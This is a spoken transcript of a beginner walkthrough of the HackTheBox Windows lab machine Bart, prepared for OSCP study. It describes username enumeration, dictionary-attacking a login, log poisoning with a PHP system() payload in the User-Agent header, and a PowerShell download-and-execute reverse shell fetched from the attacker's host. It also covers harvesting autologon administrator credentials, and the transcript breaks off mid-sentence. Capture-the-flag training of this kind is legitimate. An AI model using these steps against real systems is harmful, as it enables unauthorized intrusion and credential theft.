Hello everyone, this is Mutated Nuts and today we'll be continuing our beginner-friendly Road to OSCP video series. Today we'll be looking at another HackTheBox machine, that is Bart. Bart is based on Windows and the difficulty is medium, so let's just get started. Another thing about this box, it's present in the more challenging than OSCP section in the TJ null list. But yeah, so first thing what I always do is I run an AutoRecon scan. If you guys don't know what AutoRecon is, it's an enumeration tool. It will do few nmap scans at first, and based on the output it's going to do additional scans on them. And it's like not always rely on this particular automated scanner, because sometimes you eventually miss out things. So that's why I always know how to run things manually as well, like the commands and tools. So I'll be running this AutoRecon as root. So I'll be giving sudo over here. I'll be giving Python 3 in order to run this file. I'll be giving the target IP address, that is 10.10.10.81 in the case of Bart. I'll be giving the O switch for output directory and the output directory location where I want to save the scan result. So I did already execute the scan because it takes quite some time to execute, and we have the scan results over here. So first thing is I always look at the full TCP nmap scan, and if you look over here, we just have one port open, that's it, port 80. And when something like this happens, so it's always recommended to do another full TCP nmap scan, but a slow scan. So maybe this full TCP nmap missed out on something, so make sure that you do a slow TCP nmap scan. It may take some time, but eventually, you may get some port open, but it's not the case over here. But yeah, so we'll just look into it. We do have port 80 over here. We do have HTTP service running, and we do have IIS-10 web server present over here. Okay, so I don't think anything else over here, and we do get something like did not follow redirect to http forum.bart http. Sorry, HTTP. Okay, so we can just take this and probably we can add something like ports, since we have just one port over here, and we can just add this particular thing. And if we don't get anything on 10.10.81, we can probably just add that to our etc host file and see if we get something. So if we just load this, it says it actually redirects us to another domain name and not an IP or something, and it says it cannot be found. So obviously what we'll try to do is we just have this particular name, right? We can just try to add this in our etc host file, and host file is nothing but your local DNS, which will redirect over there to this 10.10.10.81 page. Okay, so we'll just try to do that, and I'll be using nano over here, etc host. So make sure your root when you have to modify this host file, because normal user cannot do it. He can read it but cannot write it. So I'll just probably enter 10.10.10.81 over here, and then I'll tab and I'll enter the domain name, that is forum Bart and HTTP. That's it. And probably you can enter Bart HTTP as well over here, since we already know this is like a subdomain name, and this will probably be like the actual domain. So we can enter these two over here and press Ctrl O, and this file name, right, press enter and press Ctrl X for exit. So yeah, you can modify this with the VI as well, but I'm more comfortable with nano. So okay, so we just added that particular name, and let's try to load that 10.10.10.81 page again and see if we get something. And we eventually get a web page over here, and which looks like a custom web application, but it's not. Obviously we can just go look around things, and you can try clicking things over here, but it will eventually take you different parts of the same page itself. We do get something like our team over here, so potential usernames probably. So we can just try to copy, because whenever you see something, it's highly recommended whenever you see some username or something like that, please add it and keep a note of it. Maybe you get a password eventually later, and you can use that password with that username or something like that. So it's highly recommended to obviously have something like potential users. So we do have Samantha Brown, so we can add that, Daniel Simmons and Robert Hilton. We can add that as well. We do have another one over here that says Jane Doe, so let's just add that as well over here, Jane Doe. Let's see if we get some more username over here. Oh, we don't have anything else over here. We do have something like mail info Bart HTTP. So obviously we do know the domain name already. Otherwise we would have taken this, added to host file seed if you would have got something, some different web application or not using vhost or something like that. Okay, so at the bottom you see that it's present, that powered by WordPress. So what it means is probably this page is actually running as WordPress, So whenever there's WordPress, right, so what we can do is, it obviously has like the few default directories, that is your WP content and WP admin. So you can just add admin over here or something. So all those, I think WP admin, yeah. So if you do that, you probably don't get anything over here. So unfortunately, the default directories have been modified, I guess, for this, and that does not work. There's no WP content as well over here if we just quickly check. So we don't have anything over here, and we don't have any links which are taking us to any other web application. So we are just stuck to this particular page. So another thing, quickly, we can just do a view page source. I highly recommend doing view page source for almost all application, and especially at the first initial starting page itself. Okay, so we just have this thing over here, and over here it says there is something which is commented out, and it says href, that is forum, and WP content. So probably this thing is not present now, that's why it was commented out or something. So this is what that WordPress directory default looks like. WP content will be there, WP admin would be there, and so on. Okay, so we don't have that thing present. And if we just scroll below, we can just probably look into multiple things. We obviously have the usernames over here, which we had copied earlier, right? And we do have something over here which is commented as well. And if we see, we get another potential username, that is Harvey Potter. So what we'll try to do is we'll just try to copy this over here, and we can look for things. So it says adding other employees will break the CSS, I'll fix it later. Okay, so probably don't get anything else. We do get some email ID, so probably if we had some mail service running, those things would be useful, because we can probably try to mail them for some RC or something like that through LFI. Okay, but that's not the case over here. So we just have few things. Okay, I don't think there's anything else present over here. And what we'll try to do is we'll just try to close this thing now. And AutoRecon, another thing, AutoRecon at times does not run gobuster. For some reason, at times it will not run, and for this box, eventually we'll see why I think it did not run. But yeah, so always ensure to run, gobuster scans manually over here. So I highly recommend running, because AutoRecon does a small word list. You know, at the minimum, you have to do AutoRecon does a common word list. At minimum, you have to actually do the small txt word list. Or obviously you can use the medium as well, but medium is quite large, so you can always do the small first, then do the medium if you don't get anything. Okay, so quickly what we'll try to do is, this is that AutoRecon scan. Ignore these gobuster scans, these are the ones which I manually did it later, but this is what AutoRecon gave us, nothing over here, that's it. So what we'll try to do is, we'll just try to locate the common txt word list. So these three I follow eventually, like the common txt, the small txt, and the medium txt. So common txt is over here, and this word list, I hope you guys know, like what gobuster is actually doing is try to find out directories after this particular IP over here. Let's just start with 81 first, because this is redirecting us to some other domain, right, as we saw earlier. So we'll just start with that. We'll just give u http, and we'll give 10.10.10.81, and then we'll give the word list, that is the common txt. And we'll also give the extensions. Probably it's highly recommended to give extensions, so we can probably give like ASPX, ASP, PHP, and obviously since WordPress is running, it's more likely obviously to be PHP. You can obviously do view page source and try to, you can do inspect element and try to find out something over here. I'll probably have to reload this page. To see if we get something like X powered by .NET or something like that, or PHP sys ID or something. But yeah, so we can just add these things over here. You can add HTML over here. We can add TXT. We can add bat file, because it's a Windows box, so more likely which is inclined towards Windows. Okay, so and another thing we can do is we can obviously give the O switch for output, or we can give the threads over here. So we can give 40 threads. Default is 10. It will be very slow, and it may take quite some time. So you can give 40 over here, and sometimes don't overshoot it with threads, like, because at times if you give multiple threads, the server is going to respond with too many requests and you'll end up getting a lot of errors. So don't keep it too high as well, keep it somewhere on the average side. And then you can give O switch for output, and we can probably just mention this as gobuster common txt, something like that. Okay, so let's try to run this and see what actually happens. you'll get an error which says that this error is like frequently seen in some boxes. So it says like, you know, for non-existing URL is giving a 200 error status. So that means the response from the server is 200 for the, you know, directory or files which do not exist on the server. So in short, obviously this is a kind of a protection so that you don't brute force the server or, you know, to find directories or something. So it says you can specify the wildcard. You can do two things over here. You can route this traffic to burp suite, analyze the request, but this thing is actually redirecting us always to this particular page, right, forum. So burp was not very helpful, like to actually see what kind of request and data, because it's always redirecting to some other page. And or else what you can do is you can just add wildcard over here and run it and see what happens. You'll obviously get like 200 requests, probably status code of 200 every now and then. We'll just give it a moment. So if you see over here, we just get 200, 200, 200, 200. That's it. That's what's gonna happen over here. But you know, what we can do is let this scan run. Okay, obviously I'll just close it for now because I did already execute it because it may take quite some time. So let the scan run. You'll see the 200 requests. You can probably ignore that and you can check for other requests over here. So if we just start, when we did start the gobuster scan, right, on top, we saw that multiple status code would be displayed actually. So we'll just try to check for these and we can check for 301. 301 is nothing but redirect. 301. So we'll just check for that, and this is the common txt scan which I did execute earlier. And if we just try to search for status, I'm just trying to check for this particular thing because this thing would always be there. You can check for 301 directory as well, but at times the directory names itself have 301. So just to make it more clear and simple, so we do have this forum which is redirecting over here. So let's just try to take this and try to load this over here, which is nothing but that same forum page which we came across over here earlier. It's the same page over here, and that's it. So we'll just try to move on, and we do have another thing which says monitor. So let's just try to look into this and see if we get something interesting. So probably it may, okay, so we do have something interesting over here which says server monitor, and we do have PHP server monitor v321. Okay, we do get the version number as well. That's great. So obviously you can do a quick search exploit against it, but you do get something, but you don't get it for the particular version over here. Let's just do server monitor. Let's see if this comes. Okay, so for 3.2.1, probably there's nothing over here. There's something for 3.3.1 and here, and that too, that's CSRF probably. So we don't have anything over here, and that's it. So you can do a Google search as well for this particular version if there are known vulnerabilities, but don't think there are any. It says please sign in. There's username, password. This looks like an actual vendor specific application. You can try to check out for default creds, but like that's not the way, and you won't get in with that. So you can obviously highly recommend whenever you see some vendor specific application, try to check for default creds, try to use it over here. And even if you have a password, default password, you can use it with the usernames over here, like Harvey and the password is admin or something like that, password that way. So now what we'll try to do is we'll just try to check this particular thing and see if we get a username and password. If it says that, wrong username enter or something. So I'll just try to enter mutated nuts over here and password like pass, something like that. If I try to log in, it says the information is incorrect. It does not actually tell you that, the username is incorrect or password is incorrect. So what we'll try to do is we'll just try to do forgot password and just see if, we can reset it some way. It says forgot your user password. Okay. So we'll just try to enter mutated nuts again over here, and let's just try to submit it. It says the username could not be found. So that means we do have a hint over here which says that this particular username mutated nuts does not exist, obviously. So what we'll try to do is we have few usernames over here, right? So I'll just try to remove that link. Dismiss link. Okay. So we do have multiple usernames over here. So we can try adding these usernames and see if, these are like valid passwords over here. We can add Samantha. It says username could not be found. You can add Robert over here. Obviously you can add one by one, but I'm just trying to quickly show you all if it's giving the same error. And if we add Harvey over here and if we send it, it says an email has been sent to reset your password and so and so. That means this is our correct username for this server monitor. So we can just do server monitor users. Harvey was the right username. And what we can do is, since now we know the username, we can just go back over here and you can try and check for passwords. Now, since there is you can try and enumerate this monitor page using gobuster, and you can do the same with forum, but could not find anything over there because obviously if there is some file with creds present. Another thing is, since we have multiple usernames over here and with name and surname, so we can probably try to add that. I know this is a bit obviously you should get some creds or something, or you can add Harvey and check if that's the correct password. So in order to do this particular thing, we'll just try to intercept this request in burp or route it through burp. So let's just try to add a manual proxy over here with this localhost IP and port, and then later on we'll just start burp over here, burp suite. So we'll put the interceptor off because I don't actually need it on. So I just want the HTTP traffic. So we just add Harvey over here, and I'm just adding some random password like PASS, and I'll just try to log in. The main motto is I'm just trying to capture this login request in burp suite. So obviously we do have this thing present over here, right? I'm not sure why this thing is still coming, but yeah. Okay, so we do have this thing. It says action forgot. Login. My bad. Okay, so this is a request which I want, the monitor one. Make sure that sometimes obviously we had that action forgot thing and it may mess up with something, so that's why ensure that you have this correct request over here, which is for that monitor login page. We'll just try to send this to repeater first, and if we see over here, we do have the CSRF token, and CSRF token is to avoid CSRF attacks. So what we'll try to do is we'll just try to check if obviously this token wouldn't change if you add wrong creds or something. So multiple requests. If the request is successful, probably that CSRF token would change. So the token is same over here. What we'll try to do is we have this thing and we'll just try to send it and see if we get what kind of response. We get just 200 OK over here with this is the response size. Okay, so we can do one thing. We can send it to intruder, and in intruder we'll just go over here, and these are the payload positions. Okay, so first thing, I'll just clear everything over here, and because I don't want any payload positions, because I just want to add one position for the actual payload. That is, we do know the username, that is your Harvey, so we can just add that over here, Harvey username, and the user password we can just try to add these as passwords. Okay, let's just try for now. Obviously this is a bit funny, but yeah, this is what we'll try to do. And obviously first thing I highly recommend is trying to find out if there are, I'll just make this small caps as well, or you can just try to add small caps and capital letters as well. Just try to add small caps. It's not because I know what the password is actually small caps or something, but yeah, eventually just because of the video. Because when you do it for the first time, you just leave the username as it is, right, with the caps and everything. So you can make two sets, one with caps, one with no caps or something like that. I think it was Doe. We can add Harvey also over here, and we can add Potter. Okay, so we can add these usernames over here. We can just try to take this particular thing and we can go to our burp suite. We can, this user password, we have to clear it first, and then we have to add the payload thing over here. So that means whatever we'll add over here in the payload list, so it's almost the same like gobuster, not almost, but this is what it's actually doing. It's trying to add multiple values over here and see the response, what is actually happening. So we'll have this payloads thing present over here. We'll just paste the entries which we did get from here. If this does not work, I highly recommend to use this sec list with 10k passwords and see if that is the way to go. So we do have multiple things over here, and let's just try to add this small and short dictionary attack. So let's just try to do start attack. It will say, you know, because it's a free edition, it's like throttled or something. So it's like probably running on one thread or something like that. So let's just do okay, and let's just see if this thing gets something. Like, you know, we do get something over here. This is a payload which is adding the passwords. Samantha, Brown, Daniel, Simmons, Robert, Hilton. 4 more to go. Let's just wait for this. And we do see when the spotter was entered, we do get a different status first, and we do get a different length as well. So probably this is most likely the password because you got a different status. So obviously you have to always look for the status as well as the length, because at times the status would be 200 itself, like the same one over here, but the length would be different. So make sure you check both and see if you get something different. Okay, so we do have this thing, and what we'll try to do is we can use the spotter. Sorry, just change this, add Harvey over here and add Potter, login. We do get access over here, but it says you do not have privilege to view this. I'm not sure what it is. Okay, probably just try to reload this because probably it's try to send some attack with the same. We were using intruder, right? So what we'll try to do is fresh login, and let me see. Probably the CSRF changed. I'm not sure. Okay, so we'll just try to do Harvey over here and then enter the password, that is Potter. Try to do a login over here, and it says unknown host monitor Bart HTTP because it redirected us to some different domain again, as we had seen earlier, right? Forum Bart. So obviously next step what we'll try to do is we'll just try to open the host file and try to add this particular thing over here as well, the monitor. Okay, remove the HTTP obviously. Control O, press enter, press Control X. Okay, that's it. So what we'll try to do is we'll just try to reload this thing again, but yeah, just try to refresh and close and open it. 8.1 monitor. I hope we are still logged in over here. Yeah, so once we come across, obviously it came across to this particular page, but I think it redirected us because if we try to log out and log in now, unknown host, saying the same thing again. Just try to log in. Monitor index PHP. I'm not sure why it's not letting us log out. Yeah, so that means we have come over here to this monitor bar.htb. So we can just try to use this Potter login. It's the same particular page over here. It will try to log in. Yeah, that's it. So we are over here, server monitor. Obviously we can try to check if there is any RC method over here, or we can try to enumerate these things over here and see if we get something. We do have server status logs, and we can check for this log as well and see if we get something. We do have this equal to sign. We can check for LFI, but that is not the case over here. We can check if there is something, email or some creds or something. Obviously try to enumerate, try to click all the links, as many as possible, or you can do a view page source and try to click all the links from there. Something like that. You can just try clicking links and try to see if you can do something. Like you can try to restart the server, add some script over here which will, you know, eventually run on the server. You'll get some shell, but that's not the case. And if you see over here, we do get another web page, sorry, not web page, but a domain over here which says internal 01 Bart HTTP. So let's just try to click that and see if we do get access over here or something. But let's just see if this works. It says unknown host. So obviously we do have another domain name over here. Let's just try and add it to our host file. Obviously remove the HTTP over here because we just want to enter the domain name, right? So let's just try to add that. Okay, we'll just try to load this again. Obviously it'll try to refresh, try to add it. It's already present, so just try to refresh this, then probably add that. Why is this not running? Yeah, so we do have this thing now. Obviously try to log, because at times it may take some time, obviously, because it was cached earlier that it could not find it, so that's why I did not try to find it again. So wait for some time, try to refresh, close it, or clear cache or something like that. So we do have this thing, dev internal chat login form, which looks like a custom-made login form. You can try to see if there's SQL or something present over here. And what we can do is we can just do view page source and see if we get some, something, but we don't get anything over here. Obviously it says uname and pswd, that's it, nothing else. So we do have this thing over here. There are two ways to actually get inside this particular application. So first thing is, if we see over here, once we come to this domain, it takes us to a simple chat kind of a thing, and then it takes us to login form. So you can do two things. One thing is you can try to run a gobuster with this as the URL. Second thing is you can try to run gobuster as this with the URL as a URL. Okay, so in short, this simple chat looks like a web application. So you can try to do that, and I did already execute those scans. And if we see over here the simple chat application, if I did execute, we did get the index.php, which is the default. Okay, this is the login form. My bad. I think login is not present, but login PHP is present. So this is most likely redirecting us to login form. Yeah, it takes us to the login form. So that was not present in the word list, I guess. I just use a common THT for this. So yeah, we do have multiple directories present. We do have register PHP as well. So if we just try to quickly check for that, it says that it cannot be displayed or something like that. So, but it looks like we do not have access for that register PHP, I guess. But in short, we'll just try to check for this particular web application first quickly. So we'll just try to do simple chat. Can try to Google for that, and we just find the simple chat PHP page over here, which is most likely to be this. So once we come across this, we see that there's index.php SQL simple chat, and I think there was another scan which I did over here with only internal 01 Bart HTTP, and this is what I got. So I did get the SQL, as well as I got some log page over here, as well as index page. So probably this is like the root directory, and then once you go to simple chat over here, we do have multiple pages over here which says register PHP register form. So if you look at register PHP over here, it says like you can probably try to send a post request if post password, and obviously if it says if it's empty, say password is required. So this is nothing but your user registration. So how you do create a user, right, on multiple web applications. Suppose you want to create some username mutated nuts, so you have to do that, right? But this, for some reason, this was disabled over here, so that user don't get access, they don't create it. Okay, so that was one thing over here. And in short, you just have to send a post request with two parameters probably, that is this uname parameter with the username and the pswd parameter with the password. So what we'll try to do is we just need few things over here. That is, first we'll just try to clear history, and then later on we'll just try to get this particular thing sorted. Okay, so we'll just try to send a request to this register PHP again and see if we get something. Register PHP. We'll just try to send a request, and we do get a get request over here for register PHP and register form. But we need to send a request to register PHP and not form, because I think this thing is redirecting us to register form over here as seen over here. So we need to send a request to register PHP. As we look at the source code over here, this page particularly is where that post request will be accepted. So we'll just try to send this particular thing to repeater. And once we are in repeater, what we can do is we need to send the two post parameters. So this is a get request. We'll just try to right click it, and we'll just do change request method. So we do that, we get this content type added over here as well. We get multiple things. Now what we'll try to do is we'll just try to add our, in the body over here, we'll just try to add our 2 parameters, that is uname. First, we'll just try to add that. We can just try to enter something like mutated nuts itself, and then you give this and to add the second parameter, and then you give the other parameter, that is PSSWD. This is where it's gonna actually check for if the user exists or no, something like that. Okay, so we do have this thing, and we'll just add that as well, and we'll keep the password simple as probably, yeah. Another thing is, just quickly, I just want to show you all, if we just add, you know, some username over here that you're mutated nuts, it actually does not show you that if the username exists or does not exist. So if you just add some password like HDSD, it says password must be 8 characters, but if we just try to enter mutated nuts again and try to enter a password as mutated nuts itself, so if you try to log in, it will say invalid username or password. So you don't know what is actual this username actually, and you need to enter minimum 8 characters over here. As you saw earlier, it gave us an error. So make sure over here the password is 8 characters itself. So we'll just enter something like mutated nuts itself. Just keep it simple. Same username, same password. Okay, let's just try to send this request and see if we get something. Let's just try to send it. Response taking some time. It says 302 found. We'll just try to follow redirection and see if we get something. It says 200 okay for some reason. Okay, so what we'll try to do is we just have this page over here. We'll just try to load this again. We'll just try to add mutated nuts, and we'll add mutated nuts itself again. And we'll try to log in, and we can successfully log in over here. So we are successfully registered as mutated nuts user because we just saw this code over here, try to do a request which was not visible for us in this box. But this is like the unintended method, I guess. And we have this particular thing over here, and it says something like test, well done, H, this looks good. Harvey, do not place development code over here. This is a production server. It says don't worry, but we don't see any code over here. So what we can quickly do is do a view page source. And if we look over here, we do get some request over here, right? We do get some, probably a JavaScript over here which says open this particular thing and get some log or something. So we do have something over here interesting. Obviously you can look for each and everything over here and see if you get something, but because of the hint as well on that particular chat, so we do get something over here, interesting URL. So we'll just try to look into this URL in a bit. Another thing is we can just try to log out and try to create this, you know, try to brute force this with the username Harvey. Try to brute force this with Harvey and try to get the password over here, because obviously you can try to Harvey, because we had this valid user for server monitor as well, right? That's why. So obviously you can use the other usernames over here, and you can use this as a passwords, but that's not the way. You'll have to use a, you know, password file for that, like seclist or something. So that's another thing you can do, but we'll not do that over here because I don't want to brute force it, and that's obviously brute force should never be an option. Not brute force exactly, the dictionary attack as well. If obviously we get some file with some common, you know, we get some file with like 10-15 password, that's okay, but this 10k password or something is, yeah, too much. Okay, so we'll try to go into this URL page over here. We do have this thing. Let's just try to go over here and see if we get something interesting. Try to load this thing, and we just get something like 1. It says username Harvey. So if we try to add something like mutated nuts over here, because we are also a username, right? We get something like 0. So something, there's some difference over here, and we'll just try to add Harvey itself. Don't want to enter anything. And since we have file name parameter over here with this equal to, it's most likely like, you know, you should check for LFI over here. We do have log.txt, and we do have this log.php over here. And most likely this log.txt looks like it is present in after this log. After this URL, this log.txt is present because it's file name and it's not redirecting us somewhere. So let's just try and see if this is the actual case. Let's just try to copy this over here. And let's just try to check for that log.txt. So if we see over here, we do have this log page over here, and let's just have a bit. Okay, it's going to have the same view. In short, it says Harvey, that's the particular username, I guess, coming from here. And then it says Mozilla, I think, and this is most likely the header request which we are sending. So if we see over here, we do have this thing, and let's just try to load this thing again, and let's just try to load this thing again over here and see if we get some difference. And we see that once we load this log.php file, in short, there's a request being generated over here. So if we just look at this particular Mozilla 5.0 in Burp Suite, simple chat, I think we are sending it to log. Yeah, so we need to check this, and if we see the user agent over here, this is the user agent, the same one which we are sending. Obviously this is happening because of us, and if we try to load it again, and there'll be some entry added over here as well. So in short, we do have this page present over here, the log.txt file, and we can try to probably poison this and see if this thing actually works, but that would not work because probably it does not try to include, the include function is present over there, so it will probably only add or run PHP file .php with .php extensions. So we'll just try to see that first if this actually works. So what we can do is, we do have this request over here. We'll just send it to repeater, and we'll just try to change this user agent. Why user agent? Why are we changing this thing? Is because this is the thing which is being logged over here. So we are trying to do something like a log poisoning attack, and this is what is actually being logged. This RV is nothing but coming from the URL. So we saw some different username, but we were unsuccessful, right? So this is what is coming. So we need to modify this so that we get some RC or something. We do know PHP is running over here, so we'll just do PHP echo. We can do system, and then we can actually do a request over here, because we'll send a request. Request. We'll just keep the command simple. You can enter any text you all want. So we'll just enter something like command or cmd. Just keep it short or simple, and then close this. Be careful with the quotes and everything and the brackets. Make sure you close it properly. This is what it looks like. You don't have to obviously URL encode it. It's in the header. So what we'll try to do is, we'll just try to send this request first, and it says 200 okay, and we'll just go back to this log.txt. We'll just send this request with some different user agent. So we'll just try to load this again. We do get this command over here, but obviously this is just log.txt, and it's not going to execute by itself. If we just probably try to include this thing over here and see if this thing actually works. Let's just try to load this, but that does not work over here. So if we try to do try to check that, obviously let's check that log.txt was present over here. We do have log.php in the same directory. Let's just try adding this log.php itself over here, and we don't get anything. So let's just try to remove the PHP and try to add this. We do get something over here, and that's it. So for some reason it did not show us anything. So probably we'll just try to add log.php over here and see if this thing actually works. File name log.php, because we'll try to add something in the log.php itself. So we'll do that. We just get 200 okay over here. Try to load this thing again, and now we get that it says cannot execute blank command, because when we call that log.txt file, it was not trying to execute it, and in log.php we did add it over there itself, because this is where the file name, it's going to add some entry or something like that. So this is what we did. We did try to enter that particular command, that is the user agent. We entered it in that log.php file itself, and now we try to write that file, and we are trying to call it. So what we'll try to do is, next thing it says cannot execute blank command. So obviously it's waiting for a command. We can give and over here, because we will not give question mark because that's already used over here, right? So we have to give and for different parameter. We'll just give cmd because it's the same parameter which we did enter over here in cmd. So we do that, and then later on try to do something like who am I, keep it simple, and we are over here with successful RC. That's it, iusr. Okay, so we already have successful RC over here. We'll just try to get that request quickly. We'll just send this request to repeater. We don't need sequencer, yeah, to repeater, and we do obviously have this request. Another thing is we can actually check for PowerShell if PowerShell is running, because if that is running, we can get a PowerShell reverse shell. So we can just do PowerShell C, and we can do who am I. So if we get the response, so probably PowerShell is running over here. So we'll just do that, send it, take some time, and we do have the same request over here, sorry, response. We do get this NT-authority iusr. So that means PowerShell is actually present. So next thing what we can do is we'll just try to go to the exploit directory. Two things over here. First is we'll just try to create a HTTP server, but before that we need a PowerShell reverse shell, and you all can go and get it from Nishang PowerShell. Nishang PowerShell Nishang. So the one which we are looking for is in shells and PowerShell TCP, this one. Try to get this particular file. I already have it in my system, so we do have this particular file over here. We can just try to paste it into this exploit directory. That's where our HTTP server would be running. We'll just try to, actually run this particular HTTP server now. So Python 3 m HTTP server. So we'll try to run this, and once we are running this over here, we have this particular file. We'll just try to modify this with our IP address, that is 10.10.10.14 and 19. So obviously for you all, IP address would be different on the attack machine on HackTheBox VPN, so make sure you all modify this. Another thing is, when you download this file, this actual line would not be present actually. So this last line would not be present, and you have to take this thing over here in order to run this, because we want to execute this file once it reaches the server by itself. This is a function, but it is not being called, so we need to actually call this particular function over here. So we'll particularly use this, and we'll just scroll below, and we'll try to paste this over here. Try to paste this, obviously change the IP address over here, that is 10.10.14.19, and then the port number, that is this. Okay, so we do have this thing present, and now next thing what we'll try to do is we'll just try and try to call this particular web shell. Before that, we'll just try to set up a netcat listener NVLP. So there are few ways you can since once you got RC, right, there are few ways what you can actually upgrade your RC from. That is, one is your PowerShell. Then you can obviously have the PowerShell execute from SMB share as well. So we can do that. Then we can actually call for NC using your SMB share and try to get a shell over there as well. You can, another thing, you can create our MSF Venom reverse shell and then keep it in your SMB share and try to call that. There are few ways you can actually get a shell from here, because in Linux you have Python and all these things, right? So I hope you all are aware about that. So we'll just try to write this PowerShell command now. Just try to remove this thing, write it again, PowerShell C, and then we'll just give the codes IEX and new object. So this is the PowerShell reverse shell command for IEX, not reverse shell, but get that particular string PS1 file and try to load it in the memory. So new object net web client, then download string, then start the code HTTP 10.10.14.19, then the port number where our HTTP server is running, that is 8000, and then the file name. Before that, we'll just try to close this code, close the bracket, give quotes over here, because at times it may get confusing. So over here we just need to add this particular file name. Okay, copied, paste it, and don't forget to URL encode this. Select everything, press Ctrl U, my bad, press Ctrl U and try to send this request. We'll just see netcat listener is running on port 445. This is running over here. Let's just try to send this request and see if we get a successful RC or no. So let's just try to send this. We'll see if we get a request. We do get a request, we do get a shell over here. So if you do who am I, we are over here as NT-authority iusr. So iusr is on. So quickly let's just try to go and grab a user flag over here. My bad, but we don't actually get it, I guess. So if we just do where rc users user.txt, my bad, cmdc, this is a cmd command, actually command prompt. For PowerShell there's a different command with get child item, could not find files. Okay, so because this user.txt file is present in a directory where we don't have access. So there's something tricky over here. Yeah, any which way we are as iusr. So first thing, few things you have to check is you can check for who am I and all when you are in Windows box. So you can check for those things over here. We do get some information, we do get the groups as well. There may be sometimes interesting groups present, so we can escalate to root or administrator. We do get something as obviously we have the service account thing as well, and we do get something over here for privileges, that is SeImpersonate privilege. So that is enabled over here. So we'll look into this in a bit. Okay, so we just have this SeImpersonate. We can use, you know, JuicyPotato, which we have done for the previous boxes as well, impersonate our client, and we can get system access, root access, administrator access. Yeah, so now what we can do is another thing, since we are already over here, we'll just manually enumerate. So we'll just do system info and see what kind of OS we are running. We do have x64 PVC over here, so we'll just try to copy this thing. So for priv, you can obviously add another node itself, but yeah, we are having x64. We do get few things present, install date and all this kind of thing. This may be useful if you want to check for the files which are modified after the install date or something. You do have the host name, you do have Windows 10 Pro, you don't have any patches installed, I guess. Hotfixes are none. So you do have this thing, and that's it. We don't need to get any additional information from here. So what we can quickly do is we can try to run this particular winpeas, and like in Linux boxes we do have linpeas, right? So over here we'll try to run winpeas. So we'll just try to locate that winpeas x64, I guess. I think the W is small. Okay, we do get this file, and let's try running it again. Okay, so we do have this particular file over here. We'll just try to copy it. I already have this file present in my box. If you all don't know where to get it from, go on Google, do winpeas search and get the exe file. So in short, this is nothing but an enumeration script. It's gonna do a few things for us. So we'll just have this thing copied over here. We'll just create another folder, that is SMB. So that will host a SMB file share over here and keep things neat and simple. So we do have this winpeas present inside this thing, and we'll just start a SMB server as well over here itself. We'll just start it over here probably. So to start that, we need to run it as root. Make sure you all do that, otherwise it will not run. Impacket SMB server, and then give the file shared drive name. So I'll probably name it as mutated nuts. You can give any name you all want, CMD, shared, or anything you all want. There's no mandate to that. So another thing, I just want to run, okay, I'll just go to the SMB directory first, then I'll try to run sudo impacket SMB server mutated nuts, and then later on I need to run it on the current working directory itself. So I'll just give this thing over here and pwd again. So it will start running over here. So we are hosted SMB file. Let's try to enter this again. Yeah, so this thing has started over here already. We do have this thing, users thing present. So the thing is, we are over here and there are multiple users present. We don't get the user.txt as of now, so we can go to public directory, cd public over here. We can create a directory that is tmp probably. Go to tmp. I think we can obviously write things like, let's just try to add something like test and try to add it to test.txt and type test.txt. We can very well read and write over here. So what we'll do, I think we can just run this using SMB share itself. Okay, let's see. So we do have this thing over here. Let's just copy the name, we'll require that. So we'll just try to run this particular file from SMB share. In PowerShell you can do things a bit differently. You can give this and thing over here, give this particular code, give the shared drive name, that is 10.10.14.19 first, the IP address, then the name, shared drive name, mutated nuts, and then the file name over here, that is winpeas x64. So instead of transferring it to the box, we are just trying to run it from the SMB share itself. So let's just try to run this and see if it actually executes. It may take some time, I guess. I don't think we did not get any error, and it says authenticate successful. So obviously we got the request over here. Now it will transfer the file first and then it will run. It may take some time for this. So in the meanwhile, okay, I think let's just wait for this particular thing. In the meanwhile, we'll just start this another Windows enumeration script as well, that is fuzzy security. So if by chance you are like, you know, the scripts don't work, these automated scripts, so if they don't, not automated, but enumeration scripts don't work, you have to do things manually. So you can try to run across these things over here with system info, net users, get all this kind of information, right? Manual enumeration, you can do that, check for which ports, you know, are listening or running over here. And there are multiple things you can do over here. So another thing is you can check for scheduled task and see if there is any task running, if there are any, you know, task running after periodic intervals. Like in Linux, we do have cron jobs running, right? So we can do all those kind of things over here. We can check for multiple things, like there's another thing which we would like to check in this box. That is the rec query for something which has password in it, the word password. So we'll check for this as well and see if we get something. Okay, so we do have this thing present over here, and we'll just quickly go through this scan result. We do have something over here. Don't think that is the way, but should try searching. Okay, sometimes you obviously do have false positives in this box. You do have these two ports, but it's UDP. So last resort, obviously don't forget checking it out. But since that is UDP, so we'll just leave it aside for now. And we can check for multiple things present. Obviously, when you do the box for the first time, you have to check, you know, and see if you find something interesting. But I'll just quickly go through it, and I know I'm going from bottom to top, but we should go from top to bottom. So we do have multiple things which says OS vulnerable. So you can probably like kernel exploit or something like that. You can try those as well if there's nothing. But yeah, let's just try to scroll quickly. You'll just get multiple information over here. And over here, if we see, it says that looking for autologon credentials, and we do get a autologon credential over here for administrator, and it says the default password is this. This looks like an hash, but obviously it says default password. This autologon would have plain text passwords, so this is like an actual password itself. So what we'll try to do is we'll just copy this thing over here, and we'll just try to add priv pass, something like administrator user, and then the password over here. So we do get this particular password over here. And next thing is, since we are already in PowerShell, we can try to confirm that this creds actually works for the user administrator. Okay, so what we'll try to do is we'll just try to create in, you know, Linux. It's a bit different, right? You do sudo su or something, or try to do su and try to get that particular access as well. Like if you just do su over here, like sudo su some other user, you can get access to that particular user. But in Windows, it's a bit different. So let's just look into that. How are we going to actually solve it? So credential object, try to create this. Yeah, so we do have this thing present over here. I guess this is what we need to create. Alright, I think we need to create this. So convert to secure string. So we don't need the first part, I guess. So before that, how to create credential object in PowerShell. I highly recommend having a cheat sheet for all these kind of things to create a, you know, credential object and all these kind of things, you know, in some Excel or something like that. So I do myself use it as well, but just because for the video, I'm just trying to show how to actually find these commands over here. Okay, so we do have a better, you know, thing present over here. In short, we need to create two files, that is this as plain text. So you need to create a password file first. You need to get the password over here. So we'll just try to copy this thing over here, and we'll try to paste it in cherry tree, but we need to change this quotes. We don't want those curly quotes. I think we missed out on something over here. As plain text force. Okay, so we'll just try to do that. Remove these codes over here. Put this, yeah, state one. I hope you all can notice the difference. This is what I'm talking about. So that will probably error out in PowerShell. Okay, so we do have this plain text password is nothing but this. We need to add this over here, and we'll have this thing as password, but we'll just mention this as cred, just to keep it simple. This is just a variable we are creating, so we'll just enter cred. So copy this thing, paste it over here. I hope we don't get any error. So we don't get any error. Next thing is we created the password because we need to create in this particular format. Then we need to create this particular file. Oh, my bad. Okay, any which way, it's fine. So now we need to 